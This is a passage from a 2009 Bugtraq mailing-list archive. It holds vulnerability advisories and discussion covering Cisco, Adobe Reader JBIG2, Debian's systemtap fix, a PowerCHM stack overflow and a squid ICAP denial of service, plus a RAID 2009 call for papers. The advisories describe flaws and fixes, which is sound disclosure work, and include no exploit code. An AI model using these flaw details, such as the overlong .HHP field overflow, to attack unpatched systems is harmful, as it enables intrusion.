a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
This vulnerability was reported to Cisco by Kevin Graham. Cisco would
like to thank Mr. Graham for reporting this vulnerability and working
with us towards coordinated disclosure of the vulnerability.
Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
===========
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
===============
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2009-March-25 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
iEYEARECAAYFAknKUbQACgkQ86n/Gc8U/uBoggCdGbEAh9pGrV/ApbhENou5MF4M
vTIAn03h9J//T0V6BZBxwwS2hKs/JIXi
=JGEE
-----END PGP SIGNATURE-----
From - Wed Mar 25 15:52:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006cad
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39841-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id B22EAEC183
for <lists@securityspace.com>; Wed, 25 Mar 2009 15:45:56 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id F15B723704E; Wed, 25 Mar 2009 12:40:57 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 14351 invoked from network); 25 Mar 2009 19:18:51 -0000
Message-ID: <49CA8408.8040000@uni.edu>
Date: Wed, 25 Mar 2009 14:20:40 -0500
From: "Eric C. Lukens" <eric.lukens@uni.edu>
Organization: University of Northern Iowa
User-Agent: Thunderbird 2.0.0.21 (Macintosh/20090302)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: Re: Secunia Research: Adobe Reader JBIG2 Symbol Dictionary Buffer
Overflow
References: <200903250922.n2P9M5l6016676@ca.secunia.com> <87myb9k10c.fsf@mid.deneb.enyo.de>
In-Reply-To: <87myb9k10c.fsf@mid.deneb.enyo.de>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Status:
I noticed that as well, but suspected they were notified via more then
one mechanism or had already found the bug internally. I find it funny
that they had the final code ready on the 28th, but still didn't get it
out to the public for another 2 weeks. I suppose they ran it through
one last QA procedure, or they just don't like to deliver things early.
-Eric
-------- Original Message --------
Subject: Re: Secunia Research: Adobe Reader JBIG2 Symbol Dictionary
Buffer Overflow
From: Florian Weimer <fw@deneb.enyo.de>
To: Secunia Research <remove-vuln@secunia.com>
Cc: bugtraq@securityfocus.com
Date: 3/25/09 11:42 AM
> * Secunia Research:
>
>
>> =====================================================================>> 5) Solution
>>
>> Update to version 7.1.1, 8.1.4, or 9.1.
>>
>> =====================================================================>> 6) Time Table
>>
>> 06/03/2009 - Vendor notified.
>> 07/03/2009 - Vendor response.
>> 25/03/2009 - Public disclosure.
>>
>
> Something doesn't add up because the 9.1 binary I've got was created
> on February 28th, according to Verisign's time stamping signature in
> the Authenticode signature.
>
--
Eric C. Lukens
IT Security Policy and Risk Assessment Analyst
ITS-Network Services
Curris Business Building 15
University of Northern Iowa
Cedar Falls, IA 50614-0121
319-273-7434
From - Wed Mar 25 16:12:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006cae
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39842-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 9537FEC183
for <lists@securityspace.com>; Wed, 25 Mar 2009 16:12:47 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id D1193237133; Wed, 25 Mar 2009 13:06:58 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17000 invoked from network); 25 Mar 2009 19:53:13 -0000
Date: Wed, 25 Mar 2009 22:55:32 +0300
From: "Vladimir '3APA3A' Dubrovin" <3APA3A@SECURITY.NNOV.RU>
Reply-To: "Vladimir '3APA3A' Dubrovin" <3APA3A@SECURITY.NNOV.RU>
Organization:
http://www.security.nnov.ru
X-Priority: 3 (Normal)
Message-ID: <196905565.20090325225532@SECURITY.NNOV.RU>
To: "Eric C. Lukens" <eric.lukens@uni.edu>
Cc: bugtraq@securityfocus.com
Subject: Re[2]: Secunia Research: Adobe Reader JBIG2 Symbol Dictionary Buffer Overflow
In-Reply-To: <49CA8408.8040000@uni.edu>
References: <200903250922.n2P9M5l6016676@ca.secunia.com>
<87myb9k10c.fsf@mid.deneb.enyo.de> <49CA8408.8040000@uni.edu>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Status:
Dear Eric C. Lukens,
US-CERT note TA09-051A on this issue beeing exploited in-the-wild was
issued on February, 20.
http://www.us-cert.gov/cas/techalerts/TA09-051A.html
--Wednesday, March 25, 2009, 10:20:40 PM, you wrote to bugtraq@securityfocus.com:
ECL> I noticed that as well, but suspected they were notified via more then
ECL> one mechanism or had already found the bug internally. I find it funny
ECL> that they had the final code ready on the 28th, but still didn't get it
ECL> out to the public for another 2 weeks. I suppose they ran it through
ECL> one last QA procedure, or they just don't like to deliver things early.
ECL> -Eric
ECL> -------- Original Message --------
ECL> Subject: Re: Secunia Research: Adobe Reader JBIG2 Symbol Dictionary
ECL> Buffer Overflow
ECL> From: Florian Weimer <fw@deneb.enyo.de>
ECL> To: Secunia Research <remove-vuln@secunia.com>
ECL> Cc: bugtraq@securityfocus.com
ECL> Date: 3/25/09 11:42 AM
>> * Secunia Research:
>>
>>
>>> =====================================================================>>> 5) Solution
>>>
>>> Update to version 7.1.1, 8.1.4, or 9.1.
>>>
>>> =====================================================================>>> 6) Time Table
>>>
>>> 06/03/2009 - Vendor notified.
>>> 07/03/2009 - Vendor response.
>>> 25/03/2009 - Public disclosure.
>>>
>>
>> Something doesn't add up because the 9.1 binary I've got was created
>> on February 28th, according to Verisign's time stamping signature in
>> the Authenticode signature.
>>
--
Skype: Vladimir.Dubrovin
~/ZARAZA
http://securityvulns.com/
From - Wed Mar 25 17:42:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006cb0
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39844-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id DB473EC183
for <lists@securityspace.com>; Wed, 25 Mar 2009 17:34:28 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id D71C123770B; Wed, 25 Mar 2009 14:27:56 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 24581 invoked from network); 25 Mar 2009 21:15:00 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <jmm@inutil.org>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
X-policyd-weight: DYN_NJABL=ERR NOT_IN_SBL_XBL_SPAMHAUS=-1.5 NOT_IN_BL_NJABL=-1.5 DSBL_ORG=ERR CL_IP_EQ_FROM_MX=-3.1 <client�.151.30.8> <helo=inutil.org> <from=jmm@inutil.org> <to�bian-security-announce@lists.debian.org>, rate: -6.1
Date: Wed, 25 Mar 2009 22:16:51 +0100
From: Moritz Muehlenhoff <jmm@debian.org>
Message-ID: <20090325211651.GA4429@galadriel.inutil.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.5.18 (2008-05-17)
X-SA-Exim-Connect-IP: 82.83.180.59
X-SA-Exim-Mail-From: jmm@inutil.org
X-SA-Exim-Scanned: No (on inutil.org); SAEximRunCond expanded to false
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-10.58 tagged_above=3.6 required=5.3
tests=[BAYES_00=-2, FOURLA=0.1, FVGT_m_MULTI_ODD=0.02,
IMPRONONCABLE_2=1, LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1,
MURPHY_WRONG_WORD2=0.2, PGPSIGNATURE=-5]
X-Spam-Level:
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1755-1] New systemtap packages fix local privilege escalation
Priority: urgent
Resent-Message-ID: <jP5RnZNJ2FJ.A.PVB.c9pyJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Wed, 25 Mar 2009 21:17:16 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
Debian Security Advisory DSA-1755-1 security@debian.org
http://www.debian.org/security/ Moritz Muehlenhoff
March 25, 2009
http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : systemtap
Vulnerability : race condition
Problem type : local
Debian-specific: no
CVE Id(s) : CVE-2009-0784
Erik Sjoelund discovered that a race condition in the stap tool shipped
by Systemtap, an instrumentation system for Linux 2.6, allows local
privilege escalation for members of the stapusr group.
The old stable distribution (etch) isn't affected.
For the stable distribution (lenny), this problem has been fixed in
version 0.0.20080705-1+lenny1.
For the unstable distribution (sid), this problem has been fixed in
version 0.0.20090314-2.
We recommend that you upgrade your systemtap package.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 5.0 alias lenny
- --------------------------------
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705.orig.tar.gz
Size/MD5 checksum: 880805 8f14c7b79561392e7ec91187ed09f3be
http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705-1+lenny1.diff.gz
Size/MD5 checksum: 12603 b08a9943746e474ed2aa6ed4bc9fc438
http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705-1+lenny1.dsc
Size/MD5 checksum: 1420 bfbaeb5d86bfd6876a04e562dc8c69ec
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705-1+lenny1_amd64.deb
Size/MD5 checksum: 1250966 d8368769f30ecaa915839a1fc937899d
arm architecture (ARM)
http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705-1+lenny1_arm.deb
Size/MD5 checksum: 1309852 7e006ca8bfa2bd36484bd25dda6dcb4c
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705-1+lenny1_i386.deb
Size/MD5 checksum: 1249882 ed02a4eb92c671f18702b69df5ade6d5
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705-1+lenny1_ia64.deb
Size/MD5 checksum: 1441448 7da28afa66b41d81322cf5614cb9af93
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705-1+lenny1_powerpc.deb
Size/MD5 checksum: 1269934 3016e60eb5dbab1b617bf088d807489c
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/s/systemtap/systemtap_0.0.20080705-1+lenny1_s390.deb
Size/MD5 checksum: 1227546 9edb1baaa6a126a405674be0a9dcf12c
These files will probably be moved into the stable distribution on
its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb
http://security.debian.org/ stable/updates main
For dpkg-ftp:
ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and
http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iEYEARECAAYFAknKnv4ACgkQXm3vHE4uylrGJwCg0zjilkzsim8hlQlZbA66IYPM
o5wAoJh9K6qOLsHRa4CqwJ2eRiK40lkb
=UMKo
-----END PGP SIGNATURE-----
From - Wed Mar 25 18:12:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006cb1
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39843-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 5946FEC183
for <lists@securityspace.com>; Wed, 25 Mar 2009 18:06:52 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 9337A1437AC; Wed, 25 Mar 2009 14:10:59 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 22735 invoked from network); 25 Mar 2009 20:56:04 -0000
User-Agent: Microsoft-Entourage/12.15.0.081119
Date: Wed, 25 Mar 2009 21:58:24 +0100
Subject: CFP RAID 2009
From: Corrado Leita <corrado_leita@symantec.com>
To: <bugtraq@securityfocus.com>
Message-ID: <C5F05980.1B5D%corrado_leita@symantec.com>
Thread-Topic: CFP RAID 2009
Thread-Index: AcmtjG/U0BlktruL2Eag4EbSYyLYcg=Mime-version: 1.0
Content-type: text/plain;
charset="US-ASCII"
Content-transfer-encoding: 7bit
X-OriginalArrivalTime: 25 Mar 2009 20:58:27.0241 (UTC) FILETIME=[71C32190:01C9AD8C]
Status:
CALL FOR PAPERS
RAID 2009
12th International Symposium on
Recent Advances in Intrusion Detection 2009
September 23-25, 2009
Saint Malo, Brittany, France
http://www.rennes.supelec.fr/RAID2009/
===============================================================
Topics:
-------
This symposium, the 12th in an annual series, brings together leading
researchers and practitioners from academia, government, and industry
to discuss issues and technologies related to intrusion detection and
defense. The Recent Advances in Intrusion Detection (RAID)
International Symposium series furthers advances in intrusion defense
by promoting the exchange of ideas in a broad range of topics. As in
previous years, all topics related to intrusion detection, prevention
and defense systems and technologies are within scope, including but
not limited to the following:
* Network and host intrusion detection and prevention
* Anomaly and specification-based approaches
* IDS cooperation and event correlation
* Malware prevention, detection, analysis and containment
* Web application security
* Insider attack detection
* Intrusion response, tolerance, and self protection
* Operational experience and limitations of current approaches
* Intrusion detection assessment and benchmarking
* Attacks against IDS including DoS, evasion, and IDS discovery
* Formal models, analysis, and standards
* Deception systems and honeypots
* Vulnerability analysis, risk assessment, and forensics
* Adversarial machine learning for security
* Visualization techniques
* Special environments, including mobile and sensor networks
* High-performance intrusion detection
* Legal, social, and privacy issues
* Network exfiltration detection
* Botnet analysis, detection, and mitigation
Important Dates:
----------------
Paper submission deadline: April 5, 2009
Paper acceptance or rejection: June 8, 2009
Final paper camera ready copy: June 18, 2009
Poster abstract submission deadline: June 20, 2009
Poster acceptance or rejection: June 28, 2009
Submissions:
------------
RAID 2009 invites two types of submissions:
1. Full papers presenting mature research results or summarizing
operational experience protecting or monitoring large real-world
networks. Papers can be 10-20 pages long and, if accepted, they will
be presented and included in the RAID 2009 proceedings published by
Springer Verlag in its Lecture Notes in Computer Science
(
http://www.springer.de/comp/lncs/index.html) series. Papers must be
formatted according to the instructions provided by Springer Verlag
(
http://www.springer.de/comp/lncs/authors.html), and include an
abstract and a list of keywords.
2. Posters describing innovative ideas not mature enough for a full
paper and works in progress. A two-page poster abstract formatted as
a full paper with an abstract must be submitted. If accepted, it
will be published in the proceedings and the poster will be presented.
All submissions (papers and poster abstracts) must be submitted
electronically; details will be provided on the conference
web site. Papers should list all authors and their affiliations; in case
of multiple authors, the contact author must be indicated (RAID does not
require anonymized submissions). For accepted papers, it is required
that at least one of the authors attends the conference to present the
paper. Further questions on the submission process may be sent to the
program chair. Submissions must not substantially duplicate work that
any of the authors has published elsewhere or has submitted in parallel
to a journal or to any other conference or workshop with proceedings.
Simultaneous submission of the same work to multiple venues, submission
of previously published work, and plagiarism constitute dishonesty or
fraud. RAID, like other scientific and technical conferences and journals,
prohibits these practices and may, on the recommendation of the program
chair, take action against authors who have committed them.
Organizing Committee:
---------------------
General Chair: Ludovic Me (Supelec, France, Ludovic.Me@supelec.fr)
Program Chair: Engin Kirda (Eurecom, France, kirda@eurecom.fr)
Program Co-Chair: Somesh Jha (University of Wisconsin, USA, jha@cs.wisc.edu)
Publication Chair: Davide Balzarotti (Eurecom, France,
balzarotti@eurecom.fr)
Publicity Chair: Corrado Leita (Symantec Research Europe,
Corrado_Leita@symantec.com)
Sponsorship Chair: Christophe Bidan (Supelec, France)
Steering Committee:
-------------------
Chair: Marc Dacier (Symantec Research Europe)
Herve Debar (France Telecom R&D)
Deborah Frincke (Pacific Northwest National Lab, USA)
Ming-Yuh Huang (The Boeing Company, USA)
Erland Jonsson (Chalmers)
Wenke Lee (Georgia Institute of Technology)
Ludovic Me (Supelec)
Alfonso Valdes (SRI International)
Giovanni Vigna (University of California, Santa Barbara)
Andreas Wespi (IBM Research, Switzerland)
S. Felix Wu (University of California, Davis)
Diego Zamboni (IBM Research, Switzerland)
Christopher Kruegel (University of California, Santa Barbara)
Program Committee:
-------------------
Anil Somayaji, Carleton University, Canada
Benjamin Morin, Central Directorate for Information System Security (DCSSI),
France
Christopher Kruegel, University of California, Santa Barbara, USA
Collin Jackson, Stanford University, USA
Corrado Leita, Symantec Research Europe, France
David Brumley, Carnegie Mellon University, USA
Davide Balzarotti, Eurecom, France
Dongyan Xu, Purdue University, USA
Engin Kirda, Eurecom, France
Giovanni Vigna, University of California, Santa Barbara, USA
Guevara Noubir, North Eastern University, USA
Guofei Gu, Texas A & M University, USA
Jaeyeon Jung, Intel Research, USA
John Viega, Stonewall Software, USA
Jonathan Giffin, Georgia Institute of Technology, USA
Jouni Viinikka, Orange Labs, France
Kathy Wang, MITRE
Manuel Costa, Microsoft Research, Cambridge, UK
Michael Bailey, University of Michigan, USA
Mihai Christodorescu, IBM T.J. Watson, USA
R. Sekar, Stoney Brook University, USA
Radu State, University of Luxembourg, Luxembourg
Robert Cunningham, MIT Lincoln Labs
Robin Sommer, International Computer Science Institute, USA
Somesh Jha, University of Wisconsin, USA
Sotiris Ioannidis, FORTH, Greece
Thorsten Holz, University of Mannheim, Germany
Olivier Festor, INRIA Nancy, France
Xuxian Jiang, North Carolina State University, USA
Student Scholarships:
---------------------
RAID 2009 is planning to offer student scholarships to reduce
symposium attendance costs. Students should visit the web site
(
http://www.rennes.supelec.fr/RAID2009/) to learn about the possible
availability of scholarships and application deadlines.
From - Thu Mar 26 12:12:50 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006cf0
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39846-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 6263EEC110
for <lists@securityspace.com>; Thu, 26 Mar 2009 11:37:31 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id B1D3D237129; Thu, 26 Mar 2009 08:07:43 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 7879 invoked from network); 26 Mar 2009 05:25:10 -0000
X-Spam-Processed: bkav.com.vn, Thu, 26 Mar 2009 12:28:26 +0700
(not processed: spam filter heuristic analysis disabled)
X-Authenticated-Sender: svrt@bkav.com.vn
X-MDRemoteIP: 192.168.111.124
X-Return-Path: svrt@bkav.com.vn
X-Envelope-From: svrt@bkav.com.vn
X-MDaemon-Deliver-To: bugtraq@securityfocus.com
Message-ID: <49CB1241.6060905@bkav.com.vn>
Date: Thu, 26 Mar 2009 12:27:29 +0700
From: Bkis <svrt@bkav.com.vn>
User-Agent: Thunderbird 2.0.0.21 (Windows/20090302)
MIME-Version: 1.0
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [Bkis-05-2009] PowerCHM Stack-based Buffer Overflow
Content-Type: text/plain; charset=windows-1252; format=flowed
Content-Transfer-Encoding: 8bit
Status:
PowerCHM Stack-based Buffer Overflow
1. General Information
PowerCHM is a tool that can create CHM files from Html Files, Text
Files, Microsoft Word Documents and Adobe Acrobat Document.
In March 2009, Bkis has just detected a vulnerability in the software,
related to the processing of PowerCHM project files with extension
�.HHP�. Hackers can exploit this flaw to execute any program, install
viruses, steal private information, and even take control of users�
systems. We sent the report to the vendor.
Details :
http://security.bkis.vn/?p65
SVRT Advisory : Bkis-05-2009
Initial vendor notification : 03/14/2009
Release Date : 03/26/2009
Update Date : 03/26/2009
Discovered by : Le Duc Anh, Bkis
Attack Type : Buffer Overflow
Security Rating : Critical
Impact : Code Execution
Affected Software : PowerCHM 5.7 (Prior versions may be also affected)
2. Technical Description
The vulnerability exists in the way that PowerCHM processes CHM project
files. When opening an �HHP� file with an overly long text field such as
[WINDOWS], [FILES]. it will lead to a critical stack-based overflow.
Technically, it�s very easy for hackers to exploit this flaw. A hacker
might craft an �HHP� file with malicious code embedded and trick users
into opening it. If successful, the hacker might execute arbitrary code
on the affected application.
3. Solution
Rating this vulnerability high severity and due to the fact that the
manufacturer hasn�t released any official patch for PowerCHM, Bkis
recommends that users be cautious with �HHP� files from untrustworthy
sources until the vendor release the patch.
Bkis (www.bkis.vn)
From - Fri Mar 27 14:02:52 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006d38
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39847-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 8FDE0EC10E
for <lists@securityspace.com>; Fri, 27 Mar 2009 13:54:50 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 538792372CF; Fri, 27 Mar 2009 10:49:06 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 17815 invoked from network); 26 Mar 2009 15:11:05 -0000
From: Martin Huter <m.huter@phion.com>
Organization: phion AG
To: bugtraq@securityfocus.com
Subject: ICAP adaptation: missing data flow control to client side
Date: Thu, 26 Mar 2009 16:13:32 +0100
User-Agent: KMail/1.9.6 (enterprise 20070904.708012)
MIME-Version: 1.0
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Message-ID: <200903261613.33174.m.huter@phion.com>
X-TM-AS-Product-Ver: SMEX-8.0.0.1285-5.600.1016-16544.000
X-TM-AS-Result: No--10.845400-8.000000-31
X-TM-AS-User-Approved-Sender: No
X-TM-AS-User-Blocked-Sender: No
X-virus-status: checked by phion-mailgateway, no virus found
Status:
Summary
=======
squid proxys ICAP adaptation is missing data flow control to client side. Thus
blocking
clients may cause a denial of service condition when requesting huge
downloads.
Affected Versions
=================
All squid 3.x versions
Not vulnerable
==============
None of phions HTTP proxy services (in any version) is affected.
Details
=======
squids ICAP adaptation implementation does not check body-pipes buffer size
before reading from an ICAP-server.
If the client does not read from the open connection (i.e. the user does not
confirm the browsers download-message-box in microsofts IE), squid keeps on
reading data from the ICAP server into the body pipe, whilst no more data
can be delivered to the client.
Thus the body pipes buffer is growing and squid may - in worst case - consume
memory up to the size of the users download.
Details can be found on
http://www.squid-cache.org/bugs/show_bug.cgi?id=2619
Workarounds
===========
None except disabling content adaptation via ICAP.
--
Martin Huter
Unit Manager
Release Manager
phion AG
Eduard-Bodem-Gasse 1
A-6020 Innsbruck
Tel: +43 (0) 508 100
Fax: +43 (0) 508 100 20
Mail: m.huter@phion.com
Web:
http://www.phion.com
phion AG
Vorsitzender des Aufsichtsrates: Dr. Karl Lamprecht
Vorstand: Dr. Wieland Alge, Mag. Günter Klausner
Sitz der Gesellschaft: 6020 Innsbruck, Österreich
Handelsgericht Innsbruck Firmenbuch: 184392s
UID-Nr:: ATU47509003
From - Fri Mar 27 14:13:04 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006d39
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39848-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 937F4EC10B
for <lists@securityspace.com>; Fri, 27 Mar 2009 14:04:58 -0400 (EDT)
